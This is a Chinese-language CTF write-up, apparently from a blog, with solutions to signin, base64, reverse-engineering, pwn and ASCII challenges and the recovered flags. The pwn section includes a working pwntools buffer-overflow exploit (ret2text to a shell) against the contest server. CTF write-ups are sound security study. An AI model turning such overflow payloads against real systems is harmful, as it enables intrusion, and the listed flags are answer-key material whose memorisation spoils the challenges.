比赛官网
比赛官网
部分writeup
Signin
如图所示GIF提取,然后简单的ROT13
flag{welcome-to-signin-quiz}
邮件
----如图所示简单的base64
邮件flag{WeLCoMeto}
邮箱flag{phishHUntInG}
Babyre
解析:放到IDA分析,看伪代码
得到AncsA6gXMSMoMqIuNCMuxaYuAGIavC9=关键字符转
分析得到是类似base64的加密但又不完全是
写python代码对关键字符串处理
def reverse_alnum(input_str): result = [] for char in input_str: if char.isalpha(): # 大写字母A-Z替换为Z-A if char.isupper(): result.append(chr(90 - (ord(char) - 65))) # 小写字母a-z替换为z-a else: result.append(chr(122 - (ord(char) - 97))) elif char.isdigit(): # 数字1-9替换为9-1 if char != '0': result.append(str(9 - int(char) + 1)) else: result.append('0') # 0保持不变 else: # 非字母数字字符保持不变 result.append(char) return ''.join(result) # 示例 input_str = input("请输入一个包含英文字符和数字的字符串:") output_str = reverse_alnum(input_str) print("替换后的字符串为:", output_str)
最后base64解密
答案flag{B4se64_1s_s0_e4sy}
Pwn
解释:看代码呀
构造输入的内容溢出然后ret到后门函数(简单的ret2text)
答案:flag{kOoD1EijiemeePh8IeNei2XOL8ich5de}
from pwn import * #context(os='linux',arch='amd64',log_level='debug') #p=process('./pwn') elf=ELF('./pwn') libc = ELF('libc.so.6') p=remote("prob07.contest.pku.edu.cn",10007) #gdb.attach(p, 'b *0x40121d') bin_sh_address_chuancan=0x40117a ret = 0x40121e offset=0x78 payload1=b'31:MEQCIHOFrdjB9js6X862TKy0BVBCbHCJyY9DFzfczTllh8GuAiA7m5orfJ0SRZt6xI_ZEE__jRp8V9V8YIP13k61RG9quw==' p.sendline(payload1) payload2=b'a'*offset + p64(bin_sh_address_chuancan) p.sendlineafter(b'Enter your username: ',payload2) p.sendline(payload2) #pause() p.interactive()
Gateway解析:
找到这个文件 ,十进制的ASCII的转换
答案:flag{ad1985868133e8cf1828cb84adbe5a5b}
题目资源
题目资源
有时间我再自己完全的做一遍,未完待续~
答案当然是要最后看哒:
官方writeup
集思广益
比较好的备份
